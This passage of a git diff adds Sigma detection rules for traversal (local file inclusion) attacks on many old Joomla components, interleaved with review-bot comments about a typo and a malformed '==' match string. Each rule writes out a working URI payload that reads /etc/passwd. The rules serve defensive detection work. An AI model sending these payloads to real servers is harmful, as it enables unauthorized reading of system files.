+id: 72d483b1-ef4e-4da4-a56b-d388d5fc55e4
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component News Portal 1.5.x - Local File Inclusion:Directory
+ traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml
new file mode 100644
index 00000000..6722ac48
--- /dev/null
+++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1313 exploitation attempt
+id: a9cfe674-5625-47c0-aa7b-ed19fb5aebc1
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion:Directory
+ traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and
+ 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers
+ to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
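Review bot: The CVE-2010-1313 description names the component both `Saber Cart` and `Seber Cart`; the option value in the selection is `com_sebercart`, so the first spelling is presumably the typo and the description should open with `Joomla! Component Seber Cart 1.0.0.12`. The description also notes the flaw depends on `magic_quotes_gpc` being disabled, which is why the `%00` in the selection matters; a one-line YAML comment next to the selection saying so would explain to a maintainer why the null byte is part of the match string.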
diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml
new file mode 100644
index 00000000..37a26d24
--- /dev/null
+++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1314 exploitation attempt
+id: c54f2a94-b8eb-4b33-a430-f219b97a85e1
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Highslide 1.5 - Local File Inclusion:Directory traversal
+ vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla!
+ allows remote attackers to read arbitrary files via a .. (dot dot) in the controller
+ parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml
new file mode 100644
index 00000000..b26bd3bb
--- /dev/null
+++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1345 exploitation attempt
+id: a14d080c-2aa0-4d7b-bffd-06f0e325bd0c
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Cookex Agency CKForms - Local File Inclusion:Directory
+ traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml
new file mode 100644
index 00000000..35fc5a28
--- /dev/null
+++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1353 exploitation attempt
+id: 9506788c-d0d6-4671-92b5-61a07cd5a056
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component LoginBox - Local File Inclusion:Directory traversal
+ vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml
new file mode 100644
index 00000000..c6044615
--- /dev/null
+++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1354 exploitation attempt
+id: bf6bdfcf-7229-4812-8188-9c778d97ed63
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component VJDEO 1.0 - Local File Inclusion:Directory traversal
+ vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml
new file mode 100644
index 00000000..618ab28d
--- /dev/null
+++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1470 exploitation attempt
+id: 2b631e08-2471-4b98-a385-f420ebf1f406
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Web TV 1.0 - Local File Inclusion:Directory traversal
+ vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote
+ attackers to read arbitrary files and possibly have unspecified other impact via
+ a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml
new file mode 100644
index 00000000..6e082197
--- /dev/null
+++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1471 exploitation attempt
+id: cb214df9-5948-4967-ba0b-4a5ad197313e
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Address Book 1.5.0 - Local File Inclusion:Directory
+ traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for
+ Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the
+ controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml
new file mode 100644
index 00000000..cb94d57c
--- /dev/null
+++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1472 exploitation attempt
+id: 9878af5a-91d9-474f-b4ff-4874db061c90
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory traversal
+ vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla!
+ allows remote attackers to read arbitrary files via a .. (dot dot) in the controller
+ parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml
new file mode 100644
index 00000000..a7824e77
--- /dev/null
+++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1473 exploitation attempt
+id: 09fe8c14-2dd6-4c16-9610-54e9762acd81
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory traversal
+ vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows
+ remote attackers to read arbitrary files and possibly have unspecified other impact
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml
new file mode 100644
index 00000000..7d7dc15c
--- /dev/null
+++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1474 exploitation attempt
+id: 7d738208-638c-4e01-a694-b507cae881a6
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory traversal
+ vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla!
+ allows remote attackers to read arbitrary files and possibly have unspecified other
+ impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml
new file mode 100644
index 00000000..4f733e47
--- /dev/null
+++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1475 exploitation attempt
+id: c9db721a-f2c1-4e8a-8f6a-b31aa0e51374
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion:Directory
+ traversal vulnerability in the Preventive & Reservation (com_preventive) component
+ 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml
new file mode 100644
index 00000000..17650b59
--- /dev/null
+++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml
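Review bot: The CVE-2010-1475 selection string carries a doubled equals sign, `controller==../`, so with the `contains` modifier the rule only fires on requests that contain that exact `==` sequence and misses the ordinary `controller=../` form every other rule in this batch matches. Unless the doubled `=` is deliberately copied from the upstream template, the value should read `/index.php?option=com_preventive&controller=../../../../../../../../../../etc/passwd%00`. If it is intentional, a YAML comment on that line saying so would stop the next maintainer from "fixing" it.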
@@ -0,0 +1,24 @@
+title: CVE-2010-1476 exploitation attempt
+id: 65239f96-f508-4941-b537-7837471ddcad
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Directory
+ traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5
+ for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the view parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml
new file mode 100644
index 00000000..bc6b7544
--- /dev/null
+++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1494 exploitation attempt
+id: 2ab0992e-1f93-499b-b1e6-580b651c151e
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory traversal
+ vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml
new file mode 100644
index 00000000..820bb00c
--- /dev/null
+++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1495 exploitation attempt
+id: 16173107-1da6-4bb0-884c-0113ca1bd22c
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory traversal
+ vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml
new file mode 100644
index 00000000..3b477e4e
--- /dev/null
+++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1532 exploitation attempt
+id: b0caca18-cbcd-4e57-8d26-5aa5ab1dae90
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Directory
+ traversal vulnerability in the givesight PowerMail Pro (com_powermail) component
+ 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have
+ unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml
new file mode 100644
index 00000000..989feccd
--- /dev/null
+++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1533 exploitation attempt
+id: 900bac77-29fa-47d7-a2cc-a2b259e5aa34
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory traversal
+ vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml
new file mode 100644
index 00000000..71b30ef2
--- /dev/null
+++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1534 exploitation attempt
+id: 8315e276-a65f-4617-a32b-668d19b0dcf2
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory traversal
+ vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml
new file mode 100644
index 00000000..6c1045d0
--- /dev/null
+++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1535 exploitation attempt
+id: c0e76601-93b3-4ccf-9d62-95c083ea375d
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory traversal
+ vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows
+ remote attackers to read arbitrary files and possibly have unspecified other impact
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml
new file mode 100644
index 00000000..c414ea49
--- /dev/null
+++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml
@@ -0,0 +1,23 @@
+title: CVE-2010-1601 exploitation attempt
+id: ceac625a-0a44-4cab-ba06-1d0d6cacfd89
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component JA Comment - Local File Inclusion:Directory traversal
+ vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml
new file mode 100644
index 00000000..8bc9d320
--- /dev/null
+++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1602 exploitation attempt
+id: 63b0013c-c10d-4f45-a0f5-b918514d6721
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directory
+ traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for
+ Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml
new file mode 100644
index 00000000..88e7fa06
--- /dev/null
+++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1607 exploitation attempt
+id: fc8d65e0-cbed-434d-b881-28aa0346d408
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traversal
+ vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi)
+ component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary
+ local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml
new file mode 100644
index 00000000..2dd7914c
--- /dev/null
+++ b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1657 exploitation attempt
+id: c32f0956-77ec-4875-8c3b-a84836f489a2
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory traversal
+ vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml
new file mode 100644
index 00000000..89c97e04
--- /dev/null
+++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1659 exploitation attempt
+id: 10697a46-85ff-499d-8bc5-7b6219da594a
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Directory
+ traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component
+ 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
+ in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml
new file mode 100644
index 00000000..dca273b2
--- /dev/null
+++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1714 exploitation attempt
+id: c754acbf-a0ce-4df6-843e-fb1c55af5373
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory traversal
+ vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml
new file mode 100644
index 00000000..992d7d40
--- /dev/null
+++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1717 exploitation attempt
+id: 54c142a2-27af-4786-a191-12c76398e63f
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory traversal
+ vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows
+ remote attackers to read arbitrary files and possibly have unspecified other impact
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml
new file mode 100644
index 00000000..b9306420
--- /dev/null
+++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1718 exploitation attempt
+id: 706f8907-5d0a-41db-b93f-f0ee343300b6
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Directory
+ traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores)
+ component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary
+ local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml
new file mode 100644
index 00000000..f11417c4
--- /dev/null
+++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1719 exploitation attempt
+id: e11eeb05-00e2-4d00-a572-222e6fe5e716
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Directory
+ traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for
+ Joomla! allows remote attackers to read arbitrary files and possibly have unspecified
+ other impact via a .. (dot dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
